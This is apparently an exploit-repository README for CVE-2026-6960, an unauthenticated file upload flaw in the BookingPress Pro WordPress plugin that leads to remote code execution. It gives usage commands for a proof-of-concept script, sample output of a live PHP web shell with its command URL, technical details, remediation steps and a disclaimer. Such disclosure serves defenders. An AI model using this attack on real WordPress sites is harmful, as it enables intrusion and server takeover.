## https://sploitus.com/exploit?id=F76E2DDB-D056-5DC1-A339-48C68FAA568B
# CVE-2026-6960 โ BookingPress Pro โค 5.6 | Unauthenticated Arbitrary File Upload





> **Research by:** [Atomic Edge](https://atomicedge.io)
> **Severity:** Critical | **CVSS:** 9.8 | **Auth Required:** None
---
## Overview
A critical unauthenticated arbitrary file upload vulnerability exists in the **BookingPress Pro** WordPress plugin (versions โค 5.6). The vulnerable function `bookingpress_validate_submitted_booking_form_func` processes signature field uploads without any file type or MIME type validation, allowing an unauthenticated attacker to upload a PHP web shell and achieve **Remote Code Execution (RCE)**.
| Property | Detail |
|-----------------|-----------------------------------------------------|
| **Plugin** | BookingPress Pro (bookingpress-appointment-booking-pro) |
| **Affected** | โค 5.6 |
| **Fixed In** | 5.7 |
| **Vector** | Network / Unauthenticated |
| **CWE** | CWE-434: Unrestricted Upload of File with Dangerous Type |
---
## Proof of Concept
### Requirements
```bash
pip install requests
```
### Usage
```bash
# Basic usage
python3 poc.py -u https://target.com
# Custom shell filename
python3 poc.py -u https://target.com -f myshell.php
# Skip SSL verification (self-signed certs)
python3 poc.py -u https://target.com --no-verify
```
### Example Output
```
[*] Target : https://target.com
[*] Endpoint: https://target.com/wp-admin/admin-ajax.php
[*] Payload : shell.php
[*] Sending upload request...
[+] HTTP Status : 200
[โ] Shell is LIVE!
Output of 'id': uid=33(www-data) gid=33(www-data) groups=33(www-data)
[โ] Access your shell: https://target.com/wp-content/uploads/bookingpress/shell.php?cmd=
```
---
## Technical Details
The vulnerability resides in the AJAX handler for `bookingpress_validate_submitted_booking_form`. The signature custom field accepts file uploads but performs **no validation** on:
- File extension (`.php`, `.phtml`, etc.)
- MIME type (`image/png` is trusted as-is from the request)
- File content (no magic byte verification)
Uploaded files are stored in a **web-accessible directory**, making direct execution trivial.
---
## Remediation
Plugin developers should apply the following fixes in `bookingpress_validate_submitted_booking_form_func`:
1. Use `wp_check_filetype_and_ext()` to validate extension and MIME type
2. Restrict allowed types to `image/png`, `image/jpeg`, `image/svg+xml`
3. Rename uploaded files to strip executable extensions
4. Consider storing uploads outside the web root
**โ Update to BookingPress Pro 5.7 immediately.**
---
## Disclaimer
> This repository is intended for **authorized security research and educational purposes only**.
> Do not use this tool against any system without **explicit written permission** from the system owner.
> Unauthorized use may violate the CFAA (USA), Criminal Code s.342.1 (Canada), EU NIS2 Directive, and other applicable laws.
> The authors accept **no liability** for misuse or damages arising from this code.